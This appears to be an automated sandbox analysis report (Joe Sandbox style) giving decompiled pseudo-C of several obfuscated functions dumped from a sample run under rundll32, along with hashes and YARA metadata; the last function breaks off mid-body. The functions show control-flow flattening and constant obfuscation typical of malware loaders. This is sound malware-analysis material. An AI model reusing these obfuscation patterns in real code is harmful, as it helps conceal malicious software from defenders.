                                                                                                                      0x0017b8d6
                                                                                                                      0x0017b8db
                                                                                                                      0x0017b8e3
                                                                                                                      0x0017b8f3
                                                                                                                      0x0017b8f7
                                                                                                                      0x0017b8ff
                                                                                                                      0x0017b90b
                                                                                                                      0x0017b910
                                                                                                                      0x0017b916
                                                                                                                      0x0017b91e
                                                                                                                      0x0017b926
                                                                                                                      0x0017b92e
                                                                                                                      0x0017b936
                                                                                                                      0x0017b93b
                                                                                                                      0x0017b943
                                                                                                                      0x0017b94b
                                                                                                                      0x0017b953
                                                                                                                      0x0017b95b
                                                                                                                      0x0017b967
                                                                                                                      0x0017b96a
                                                                                                                      0x0017b96e
                                                                                                                      0x0017b973
                                                                                                                      0x0017b97b
                                                                                                                      0x0017b981
                                                                                                                      0x0017b981
                                                                                                                      0x0017b987
                                                                                                                      0x0017b9f6
                                                                                                                      0x0017b9fb
                                                                                                                      0x0017ba04
                                                                                                                      0x0017b989
                                                                                                                      0x0017b98b
                                                                                                                      0x00000000
                                                                                                                      0x0017b98d
                                                                                                                      0x0017b98d
                                                                                                                      0x0017b991
                                                                                                                      0x0017b99c
                                                                                                                      0x0017b9a1
                                                                                                                      0x0017b9a7
                                                                                                                      0x0017b9aa
                                                                                                                      0x0017b9ac
                                                                                                                      0x00000000
                                                                                                                      0x0017b9ac
                                                                                                                      0x0017b98b
                                                                                                                      0x0017ba08
                                                                                                                      0x0017ba15
                                                                                                                      0x0017ba15
                                                                                                                      0x0017b9bc
                                                                                                                      0x0017b9bd
                                                                                                                      0x0017b9c0
                                                                                                                      0x0017b9c8
                                                                                                                      0x0017b9ca
                                                                                                                      0x0017b9cc
                                                                                                                      0x0017b9d2
                                                                                                                      0x0017b9d2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Cx.$w2z$~#{*
                                                                                                                      • API String ID: 0-3781971293
                                                                                                                      • Opcode ID: d2f747e9dfa1f165f3d692b78e8f5621b7ba6b58217bdfd58ab2ddbc9ef0f924
                                                                                                                      • Instruction ID: ddb5ae296642c975701cdf5231c0f13cc611111b8d0465ec18459b3016c4ae73
                                                                                                                      • Opcode Fuzzy Hash: d2f747e9dfa1f165f3d692b78e8f5621b7ba6b58217bdfd58ab2ddbc9ef0f924
                                                                                                                      • Instruction Fuzzy Hash: 195189B150D3019FC308DF25E88A50BBBE2FBC8758F008A1DF599A6260D371DA498F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 001744FA Relevance: 3.9, Strings: 3, Instructions: 122COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E001744FA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* _t110;
				signed int _t116;
				signed int _t120;
				void* _t126;
				signed int _t135;
				signed int _t136;
				void* _t138;
				signed int* _t141;

				_push(_a12);
				_t138 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0017CF25(_t110);
				_v584 = 0x353aee;
				_t141 =  &(( &_v596)[5]);
				_t126 = 0x2b8a3ea;
				_t135 = 0x6c;
				_v584 = _v584 * 0x28;
				_v584 = _v584 | 0xfff7ffbb;
				_v584 = _v584 ^ 0xfff7ffab;
				_v560 = 0x47639d;
				_v560 = _v560 + 0xffffee4d;
				_v560 = _v560 ^ 0x00482f45;
				_v568 = 0x9954f4;
				_v568 = _v568 >> 4;
				_v568 = _v568 << 0xe;
				_v568 = _v568 ^ 0x655e48ca;
				_v572 = 0x27eb8;
				_v572 = _v572 << 0xf;
				_v572 = _v572 | 0x08d3f6f7;
				_v572 = _v572 ^ 0x4e414fab;
				_v572 = _v572 ^ 0x7197c1a5;
				_v592 = 0xd88b27;
				_v592 = _v592 | 0xcb2a0632;
				_v592 = _v592 ^ 0x61d9313a;
				_v592 = _v592 * 0x31;
				_v592 = _v592 ^ 0x90d0f268;
				_v564 = 0x1e6f95;
				_v564 = _v564 + 0xffffd458;
				_v564 = _v564 ^ 0x0016c965;
				_v556 = 0x7ec301;
				_v556 = _v556 / _t135;
				_v556 = _v556 ^ 0x0008e3f1;
				_v576 = 0xe82a72;
				_v576 = _v576 >> 7;
				_t116 = _v576;
				_t136 = 0x3f;
				_t134 = _t116 % _t136;
				_v576 = _t116 / _t136;
				_v576 = _v576 * 0x66;
				_v576 = _v576 ^ 0x00094998;
				_v596 = 0x9d9cf;
				_v596 = _v596 + 0xffff3374;
				_v596 = _v596 ^ 0xdf943dc0;
				_v596 = _v596 ^ 0x9d51af04;
				_v596 = _v596 ^ 0x42c0e9a6;
				_v580 = 0x1688bd;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 + 0xf36b;
				_v580 = _v580 * 0x11;
				_v580 = _v580 ^ 0x001dff3c;
				_v588 = 0xc39d29;
				_v588 = _v588 + 0xc15a;
				_t120 = _v588 * 0x65;
				_v588 = _t120;
				_v588 = _v588 << 0x10;
				_v588 = _v588 ^ 0x49a37055;
				do {
					while(_t126 != 0x10fdd0e) {
						if(_t126 == 0x1b35a13) {
							return E00189045(_v596, _t134,  &_v520, _t138,  &_v552, _v580, _v588);
						}
						if(_t126 != 0x2b8a3ea) {
							goto L6;
						}
						_t134 =  &_v552;
						_t120 = E00191310(_v584,  &_v552, _v560, _v568, _v572, _v592);
						_t141 =  &(_t141[4]);
						_t126 = 0x10fdd0e;
					}
					_push(_t126);
					_t134 =  &_v520;
					_t120 = E0017AC8C(_v564,  &_v520, _v556, _v576);
					_t141 =  &(_t141[3]);
					_t126 = 0x1b35a13;
					L6:
				} while (_t126 != 0x712552c);
				return _t120;
			}
























                                                                                                                      0x00174504
                                                                                                                      0x0017450b
                                                                                                                      0x0017450d
                                                                                                                      0x00174514
                                                                                                                      0x0017451b
                                                                                                                      0x0017451c
                                                                                                                      0x0017451d
                                                                                                                      0x00174522
                                                                                                                      0x0017452a
                                                                                                                      0x0017453e
                                                                                                                      0x00174542
                                                                                                                      0x00174543
                                                                                                                      0x00174547
                                                                                                                      0x0017454f
                                                                                                                      0x00174557
                                                                                                                      0x0017455f
                                                                                                                      0x00174567
                                                                                                                      0x0017456f
                                                                                                                      0x00174577
                                                                                                                      0x0017457c
                                                                                                                      0x00174581
                                                                                                                      0x00174589
                                                                                                                      0x00174591
                                                                                                                      0x00174596
                                                                                                                      0x0017459e
                                                                                                                      0x001745a6
                                                                                                                      0x001745ae
                                                                                                                      0x001745b6
                                                                                                                      0x001745be
                                                                                                                      0x001745cd
                                                                                                                      0x001745d1
                                                                                                                      0x001745d9
                                                                                                                      0x001745e1
                                                                                                                      0x001745e9
                                                                                                                      0x001745f1
                                                                                                                      0x00174601
                                                                                                                      0x00174605
                                                                                                                      0x0017460d
                                                                                                                      0x00174615
                                                                                                                      0x0017461a
                                                                                                                      0x0017461e
                                                                                                                      0x0017461f
                                                                                                                      0x00174626
                                                                                                                      0x0017462f
                                                                                                                      0x00174633
                                                                                                                      0x0017463b
                                                                                                                      0x00174643
                                                                                                                      0x0017464b
                                                                                                                      0x00174653
                                                                                                                      0x0017465b
                                                                                                                      0x00174663
                                                                                                                      0x0017466b
                                                                                                                      0x00174670
                                                                                                                      0x0017467d
                                                                                                                      0x00174681
                                                                                                                      0x00174689
                                                                                                                      0x00174691
                                                                                                                      0x00174699
                                                                                                                      0x0017469e
                                                                                                                      0x001746a2
                                                                                                                      0x001746a7
                                                                                                                      0x001746af
                                                                                                                      0x001746af
                                                                                                                      0x001746b5
                                                                                                                      0x00000000
                                                                                                                      0x00174720
                                                                                                                      0x001746b9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x001746bf
                                                                                                                      0x001746d3
                                                                                                                      0x001746d8
                                                                                                                      0x001746db
                                                                                                                      0x001746db
                                                                                                                      0x001746df
                                                                                                                      0x001746e4
                                                                                                                      0x001746f0
                                                                                                                      0x001746f5
                                                                                                                      0x001746f8
                                                                                                                      0x001746fa
                                                                                                                      0x001746fa
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: E/H$r*$:5
                                                                                                                      • API String ID: 0-3508030207
                                                                                                                      • Opcode ID: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction ID: 54fadbe24278c28767ab8aed583a9fbfcd30e8f1a03f9080ed3ee232713c7270
                                                                                                                      • Opcode Fuzzy Hash: bdc7eb3c234c05e9e6cdbdc0e6f0d16dbbad6f054e1b81a557a4ca66bb56ad1d
                                                                                                                      • Instruction Fuzzy Hash: CC5120714083429BC748DF21C98A81FBBF1BBD8758F505A1DF19AA6221D7B18A49CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017AE9A Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0017AE9A() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				void* _t93;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				intOrPtr _t109;
				signed int* _t111;

				_t111 =  &_v364;
				_v332 = 0xbc8cfe;
				_t109 = 0;
				_t93 = 0x544b857;
				_v328 = 0;
				_v324 = 0;
				_v348 = 0xa18708;
				_v348 = _v348 | 0xdf6aec5f;
				_v348 = _v348 ^ 0xdfe83fdc;
				_v356 = 0xddc275;
				_v356 = _v356 + 0xef66;
				_t105 = 0x44;
				_v356 = _v356 / _t105;
				_v356 = _v356 ^ 0x000c07d0;
				_v360 = 0xb33a69;
				_v360 = _v360 + 0x311b;
				_v360 = _v360 + 0xffff8b8d;
				_v360 = _v360 ^ 0x00b7daa7;
				_v364 = 0x70c027;
				_t106 = 0x45;
				_v364 = _v364 / _t106;
				_v364 = _v364 >> 3;
				_t107 = 0x76;
				_v364 = _v364 / _t107;
				_v364 = _v364 ^ 0x00047190;
				_v340 = 0xefeeea;
				_v340 = _v340 >> 9;
				_v340 = _v340 ^ 0x00027f77;
				_v352 = 0xde5c51;
				_v352 = _v352 + 0xffff1c5e;
				_v352 = _v352 ^ 0x00dc38de;
				_v344 = 0x59a1b5;
				_v344 = _v344 + 0xf1eb;
				_v344 = _v344 ^ 0x005dc95d;
				_v336 = 0x74ce3f;
				_v336 = _v336 + 0xffffdac0;
				_v336 = _v336 ^ 0x0079bed4;
				do {
					while(_t93 != 0x136692) {
						if(_t93 == 0x147bc0f) {
							_t93 = 0xf967eb2;
							_t109 = _t109 + _v276 * 0x64;
							continue;
						} else {
							if(_t93 == 0x544b857) {
								_t93 = 0x136692;
								continue;
							} else {
								if(_t93 == 0x6e5561d) {
									_t93 = 0xde10965;
									_t109 = _t109 + (_v2 & 0x000000ff) * 0x186a0;
									continue;
								} else {
									if(_t93 == 0x9c7e626) {
										E00173D8A(_v340,  &_v320, _v352, _v344, _v336);
										_t111 =  &(_t111[3]);
										_t93 = 0x6e5561d;
										continue;
									} else {
										if(_t93 == 0xde10965) {
											_t93 = 0x147bc0f;
											_t109 = _t109 + _v280 * 0x3e8;
											continue;
										} else {
											if(_t93 != 0xf967eb2) {
												goto L16;
											} else {
												_t109 = _t109 + (_v320 & 0x0000ffff);
											}
										}
									}
								}
							}
						}
						L9:
						return _t109;
					}
					_v284 = 0x11c;
					E00185A5C( &_v284, _v348, _v356, _v360, _v364);
					_t111 =  &(_t111[3]);
					_t93 = 0x9c7e626;
					L16:
				} while (_t93 != 0xf3c44c2);
				goto L9;
			}

























                                                                                                                      0x0017ae9a
                                                                                                                      0x0017aea0
                                                                                                                      0x0017aead
                                                                                                                      0x0017aeaf
                                                                                                                      0x0017aeb4
                                                                                                                      0x0017aebd
                                                                                                                      0x0017aec6
                                                                                                                      0x0017aece
                                                                                                                      0x0017aed6
                                                                                                                      0x0017aede
                                                                                                                      0x0017aee6
                                                                                                                      0x0017aef5
                                                                                                                      0x0017aefa
                                                                                                                      0x0017af00
                                                                                                                      0x0017af08
                                                                                                                      0x0017af10
                                                                                                                      0x0017af18
                                                                                                                      0x0017af20
                                                                                                                      0x0017af28
                                                                                                                      0x0017af34
                                                                                                                      0x0017af39
                                                                                                                      0x0017af3f
                                                                                                                      0x0017af48
                                                                                                                      0x0017af50
                                                                                                                      0x0017af54
                                                                                                                      0x0017af5c
                                                                                                                      0x0017af64
                                                                                                                      0x0017af69
                                                                                                                      0x0017af71
                                                                                                                      0x0017af79
                                                                                                                      0x0017af81
                                                                                                                      0x0017af89
                                                                                                                      0x0017af91
                                                                                                                      0x0017af99
                                                                                                                      0x0017afa1
                                                                                                                      0x0017afa9
                                                                                                                      0x0017afb1
                                                                                                                      0x0017afb9
                                                                                                                      0x0017afb9
                                                                                                                      0x0017afc3
                                                                                                                      0x0017b05c
                                                                                                                      0x0017b05e
                                                                                                                      0x00000000
                                                                                                                      0x0017afc9
                                                                                                                      0x0017afcf
                                                                                                                      0x0017b050
                                                                                                                      0x00000000
                                                                                                                      0x0017afd1
                                                                                                                      0x0017afd7
                                                                                                                      0x0017b03e
                                                                                                                      0x0017b049
                                                                                                                      0x00000000
                                                                                                                      0x0017afd9
                                                                                                                      0x0017afdf
                                                                                                                      0x0017b027
                                                                                                                      0x0017b02c
                                                                                                                      0x0017b02f
                                                                                                                      0x00000000
                                                                                                                      0x0017afe1
                                                                                                                      0x0017afe7
                                                                                                                      0x0017b00d
                                                                                                                      0x0017b00f
                                                                                                                      0x00000000
                                                                                                                      0x0017afe9
                                                                                                                      0x0017afeb
                                                                                                                      0x00000000
                                                                                                                      0x0017aff1
                                                                                                                      0x0017aff6
                                                                                                                      0x0017aff6
                                                                                                                      0x0017afeb
                                                                                                                      0x0017afe7
                                                                                                                      0x0017afdf
                                                                                                                      0x0017afd7
                                                                                                                      0x0017afcf
                                                                                                                      0x0017aff9
                                                                                                                      0x0017b004
                                                                                                                      0x0017b004
                                                                                                                      0x0017b06d
                                                                                                                      0x0017b081
                                                                                                                      0x0017b086
                                                                                                                      0x0017b089
                                                                                                                      0x0017b08e
                                                                                                                      0x0017b08e
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: e$e$f
                                                                                                                      • API String ID: 0-1877623186
                                                                                                                      • Opcode ID: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction ID: 7ff9f14292b22148483bb31e00bf89dd9c44d19e3cf7a3268120ca4a9a137ca8
                                                                                                                      • Opcode Fuzzy Hash: 3bc59c3c401371c9cdb65951a26b58042382158b88ab3837599062e84b37cfbd
                                                                                                                      • Instruction Fuzzy Hash: B64189B160C3028BC718CE25D59556FBAF1EFD4708F148A2EF59A56260D3B4CA09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00176C29 Relevance: 3.8, Strings: 3, Instructions: 94COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E00176C29() {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _v44;
				intOrPtr _v48;
				void* _t89;
				intOrPtr _t98;
				signed int _t102;
				signed int _t103;
				void* _t105;

				_v48 = 0xcb88bc;
				asm("stosd");
				_t102 = 0x47;
				asm("stosd");
				_t89 = 0xf0122cf;
				asm("stosd");
				_v16 = 0x79c750;
				_v16 = _v16 + 0x2192;
				_v16 = _v16 ^ 0x37fffb71;
				_v16 = _v16 + 0xffff9df1;
				_v16 = _v16 ^ 0x3784de23;
				_v12 = 0x72aa7c;
				_v12 = _v12 * 0x4d;
				_v12 = _v12 + 0x37d5;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x02292cf3;
				_v8 = 0x96e633;
				_v8 = _v8 ^ 0x4b98ff22;
				_v8 = _v8 ^ 0x9d1458e0;
				_v8 = _v8 | 0xdef8ea17;
				_v8 = _v8 ^ 0xdef824a2;
				_v28 = 0x117d;
				_v28 = _v28 / _t102;
				_v28 = _v28 >> 0x10;
				_v28 = _v28 ^ 0x00058012;
				_v24 = 0x3d67df;
				_v24 = _v24 | 0x442c4c66;
				_t44 =  &_v24; // 0x442c4c66
				_t103 = 0x76;
				_v24 =  *_t44 / _t103;
				_v24 = _v24 ^ 0x009d94f1;
				_v32 = 0x4e376f;
				_v32 = _v32 << 0xd;
				_v32 = _v32 ^ 0xc6ef13b7;
				_v20 = 0x3e602c;
				_v20 = _v20 ^ 0x8d0d4ca7;
				_v20 = _v20 << 6;
				_v20 = _v20 * 0x6d;
				_v20 = _v20 ^ 0xb2734839;
				do {
					while(_t89 != 0x600d2ee) {
						if(_t89 == 0xf0122cf) {
							_push(_t89);
							_push(_t89);
							 *0x195210 = E00183512(0x138);
							_t89 = 0x600d2ee;
							continue;
						}
						goto L5;
					}
					_t98 =  *0x195210; // 0x0
					E0018A156(_v28, _t98 + 0x1c, _v24, _v32, _v20);
					_t105 = _t105 + 0xc;
					_t89 = 0x7d77246;
					L5:
				} while (_t89 != 0x7d77246);
				return 1;
			}

















                                                                                                                      0x00176c2f
                                                                                                                      0x00176c40
                                                                                                                      0x00176c48
                                                                                                                      0x00176c4b
                                                                                                                      0x00176c4c
                                                                                                                      0x00176c4e
                                                                                                                      0x00176c4f
                                                                                                                      0x00176c5b
                                                                                                                      0x00176c62
                                                                                                                      0x00176c69
                                                                                                                      0x00176c70
                                                                                                                      0x00176c77
                                                                                                                      0x00176c82
                                                                                                                      0x00176c85
                                                                                                                      0x00176c8c
                                                                                                                      0x00176c90
                                                                                                                      0x00176c97
                                                                                                                      0x00176c9e
                                                                                                                      0x00176ca5
                                                                                                                      0x00176cac
                                                                                                                      0x00176cb3
                                                                                                                      0x00176cba
                                                                                                                      0x00176cc8
                                                                                                                      0x00176ccb
                                                                                                                      0x00176ccf
                                                                                                                      0x00176cd6
                                                                                                                      0x00176cdd
                                                                                                                      0x00176ce4
                                                                                                                      0x00176ce7
                                                                                                                      0x00176cef
                                                                                                                      0x00176cf2
                                                                                                                      0x00176cf9
                                                                                                                      0x00176d00
                                                                                                                      0x00176d04
                                                                                                                      0x00176d0b
                                                                                                                      0x00176d12
                                                                                                                      0x00176d19
                                                                                                                      0x00176d21
                                                                                                                      0x00176d24
                                                                                                                      0x00176d2b
                                                                                                                      0x00176d2b
                                                                                                                      0x00176d31
                                                                                                                      0x00176d3c
                                                                                                                      0x00176d3d
                                                                                                                      0x00176d4a
                                                                                                                      0x00176d4f
                                                                                                                      0x00000000
                                                                                                                      0x00176d4f
                                                                                                                      0x00000000
                                                                                                                      0x00176d31
                                                                                                                      0x00176d5c
                                                                                                                      0x00176d68
                                                                                                                      0x00176d6d
                                                                                                                      0x00176d70
                                                                                                                      0x00176d72
                                                                                                                      0x00176d72
                                                                                                                      0x00176d7f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,`>$fL,D$o7N
                                                                                                                      • API String ID: 0-3130479144
                                                                                                                      • Opcode ID: be2af31fe57058f69e52f37f60932d10dad2aa2117ec0486d88ce01ab4a0d4f9
                                                                                                                      • Instruction ID: 465bc3586fe93e07ddc8f3fdc3e280c59f4232d0da8212a89b54b64666643336
                                                                                                                      • Opcode Fuzzy Hash: be2af31fe57058f69e52f37f60932d10dad2aa2117ec0486d88ce01ab4a0d4f9
                                                                                                                      • Instruction Fuzzy Hash: 714144B1E0020AEBDF49CFA8C9864EEBBB1FF54314F208559D521A6260E3B40B44CF91
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00176ED6 Relevance: 3.8, Strings: 3, Instructions: 88COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E00176ED6(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t87;
				void* _t89;
				intOrPtr* _t90;
				signed int _t93;
				intOrPtr _t104;

				_v48 = 0x387a4d;
				_v44 = 0;
				_v40 = 0;
				_v24 = 0x2424c8;
				_v24 = _v24 ^ 0x2613c361;
				_t93 = 0x67;
				_t104 = _a4;
				_v24 = _v24 * 0x39;
				_v24 = _v24 ^ 0x8272caac;
				_v8 = 0x1db7b6;
				_v8 = _v8 * 0x22;
				_v8 = _v8 + 0xffff08c1;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x7e2ce57a;
				_v32 = 0xc3f5b3;
				_v32 = _v32 * 0x7f;
				_v32 = _v32 ^ 0x61389900;
				_v12 = 0x2d74a5;
				_v12 = _v12 / _t93;
				_v12 = _v12 + 0xffffbd08;
				_v12 = _v12 * 0x6a;
				_v12 = _v12 ^ 0x0019f3c3;
				_v28 = 0x7d8734;
				_v28 = _v28 >> 7;
				_v28 = _v28 << 1;
				_v28 = _v28 ^ 0x000207bd;
				_v20 = 0x79f3b3;
				_v20 = _v20 | 0xe743018d;
				_v20 = _v20 + 0xb3b6;
				_v20 = _v20 + 0x51ad;
				_v20 = _v20 ^ 0xe775faa1;
				_v36 = 0x6d6a5a;
				_v36 = _v36 << 0xd;
				_v36 = _v36 ^ 0xad48a6bc;
				_v16 = 0x62a4bc;
				_v16 = _v16 >> 7;
				_v16 = _v16 << 0xa;
				_v16 = _v16 * 0x38;
				_v16 = _v16 ^ 0xac926db4;
				_t87 =  *((intOrPtr*)(_t104 + 0xc))( *((intOrPtr*)(_t104 + 0x30)), 1, 0);
				_t109 = _t87;
				if(_t87 != 0) {
					_push(0x17188c);
					_push(_v32);
					_t72 =  &_v8; // 0x7e2ce57a
					_t89 = E0017BB4B(_v24,  *_t72, _t109);
					_push( *((intOrPtr*)(_t104 + 0x30)));
					_t106 = _t89;
					_push(_v28);
					_t90 = E00189861(_v12, _t89);
					if(_t90 != 0) {
						 *_t90();
					}
					E0017AE03(_v20, _v36, _v16, _t106);
				}
				return 0;
			}



















                                                                                                                      0x00176edc
                                                                                                                      0x00176ee8
                                                                                                                      0x00176eeb
                                                                                                                      0x00176eee
                                                                                                                      0x00176ef5
                                                                                                                      0x00176f03
                                                                                                                      0x00176f04
                                                                                                                      0x00176f07
                                                                                                                      0x00176f0a
                                                                                                                      0x00176f11
                                                                                                                      0x00176f1f
                                                                                                                      0x00176f22
                                                                                                                      0x00176f29
                                                                                                                      0x00176f2d
                                                                                                                      0x00176f34
                                                                                                                      0x00176f3f
                                                                                                                      0x00176f42
                                                                                                                      0x00176f49
                                                                                                                      0x00176f55
                                                                                                                      0x00176f58
                                                                                                                      0x00176f63
                                                                                                                      0x00176f66
                                                                                                                      0x00176f6d
                                                                                                                      0x00176f74
                                                                                                                      0x00176f78
                                                                                                                      0x00176f7b
                                                                                                                      0x00176f82
                                                                                                                      0x00176f89
                                                                                                                      0x00176f90
                                                                                                                      0x00176f97
                                                                                                                      0x00176f9e
                                                                                                                      0x00176fa5
                                                                                                                      0x00176fac
                                                                                                                      0x00176fb0
                                                                                                                      0x00176fb7
                                                                                                                      0x00176fbe
                                                                                                                      0x00176fc2
                                                                                                                      0x00176fca
                                                                                                                      0x00176fcd
                                                                                                                      0x00176fd7
                                                                                                                      0x00176fda
                                                                                                                      0x00176fdc
                                                                                                                      0x00176fde
                                                                                                                      0x00176fe3
                                                                                                                      0x00176fe6
                                                                                                                      0x00176fec
                                                                                                                      0x00176ff1
                                                                                                                      0x00176ff4
                                                                                                                      0x00176ff6
                                                                                                                      0x00176ffe
                                                                                                                      0x00177008
                                                                                                                      0x0017700a
                                                                                                                      0x0017700a
                                                                                                                      0x00177016
                                                                                                                      0x0017701c
                                                                                                                      0x00177024

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Mz8$Zjm$z,~
                                                                                                                      • API String ID: 0-2456983437
                                                                                                                      • Opcode ID: bf03b490bbac42444789797d7569fe9e421a7cf82d863269f6cf3f46f779bc94
                                                                                                                      • Instruction ID: 2895aea23890a3594c39308e8d48d5d89246938ce7dbd01326a82aff6090f65a
                                                                                                                      • Opcode Fuzzy Hash: bf03b490bbac42444789797d7569fe9e421a7cf82d863269f6cf3f46f779bc94
                                                                                                                      • Instruction Fuzzy Hash: CA41F071D0031AABCF08CFA5C98A8EEBBB5FB44314F208159D821B6250D7B95B55CF95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00193672 Relevance: 3.8, Strings: 3, Instructions: 54COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E00193672() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _t69;
				intOrPtr _t71;

				_v16 = 0x1920f4;
				_v16 = _v16 | 0xcc0e70e0;
				_v16 = _v16 + 0xffff67e9;
				_v16 = _v16 >> 0xe;
				_v16 = _v16 ^ 0x00056687;
				_v12 = 0xe97d2f;
				_v12 = _v12 * 5;
				_v12 = _v12 + 0xdb12;
				_v12 = _v12 ^ 0x6ef3d177;
				_v12 = _v12 ^ 0x6a6f4e7b;
				_v8 = 0xee58e5;
				_v8 = _v8 + 0xffff20e4;
				_v8 = _v8 + 0x2db7;
				_v8 = _v8 + 0xffff706b;
				_v8 = _v8 ^ 0x00e27cba;
				_v24 = 0x674fea;
				_v24 = _v24 << 0xd;
				_v24 = _v24 << 0xe;
				_v24 = _v24 + 0xffff2a40;
				_v24 = _v24 ^ 0x4ff265ad;
				_v32 = 0x2c6dbe;
				_v32 = _v32 >> 2;
				_v32 = _v32 ^ 0x000c65e7;
				_v20 = 0xd3ac82;
				_v20 = _v20 * 0x77;
				_v20 = _v20 << 0xc;
				_v20 = _v20 + 0x1c1c;
				_v20 = _v20 ^ 0x53000be4;
				_v28 = 0xd3eaf5;
				_v28 = _v28 ^ 0xd0f82d1e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x57832eb1;
				_t69 =  *0x195c9c; // 0x0
				E0018E884(_v16, _v12, _v8,  *((intOrPtr*)(_t69 + 0x50)));
				_t71 =  *0x195c9c; // 0x0
